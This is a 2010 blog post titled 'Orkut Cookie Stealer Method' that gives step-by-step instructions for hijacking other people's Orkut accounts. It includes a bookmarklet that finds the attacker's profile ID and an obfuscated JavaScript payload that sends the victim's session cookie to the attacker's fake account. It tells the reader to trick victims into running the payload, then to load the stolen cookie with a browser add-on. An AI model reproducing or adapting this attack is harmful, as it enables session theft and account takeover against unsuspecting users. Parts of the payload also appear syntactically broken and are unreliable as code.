Tuesday, March 16, 2010

Orkut Cookie Stealer Method ( HaCk Orkut ID's )

Orkut cookie stealing script

Requirements:-

1]Firefox
2]Add and edit cookie addon:- https://addons.mozilla.org/firefox/addon/573

Instructions:

1]First of all make a fake account
2]You will need GID of your profile so use the following script
3]In order to get the GID,Go to your fake account homepage and paste this script in the address bar and hit enter You will see the gid in the box.

Code:

script:void(prompt('',document.body.innerHTML.match(/http:\/\/\w+.orkut.com\/images\/\w+\/\d+\/([0-9]+).jpg/gi).join('\n').toString().replace(/http:\/\/\w+.orkut.com\/images\/\w+\/\d+\/([0-9]+).jpg/gi,'$1')))

Now suppose your GID is 2541021 then your cookie stealing script will be like this

Code:
java script:orkut=replyForm;orkut.toUserId.value=2541021;orkut.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101));orkut.action=Scrapbook.aspx?Action.submit;orkut.submit();i=0;a=document.links;setInterval(i++;a[i %document.links.length].style.color=c[i%c.length],10);void(0);

Scrap this to victim and tell him/her to run it in the addressbar, as soon as he/she runs the script you will get a cookie info into your fake account.Now go to the fake account and copy the cookie from "ORKUTPREF=ID=.."onwards till end.

Now go to
Tools>>cookie editor>> See the orkut+state Id and click on edit

Paste the whole cookie you copied, in the content.Click on save and close it.Just refresh it.Now you will be in victims account.

No comments: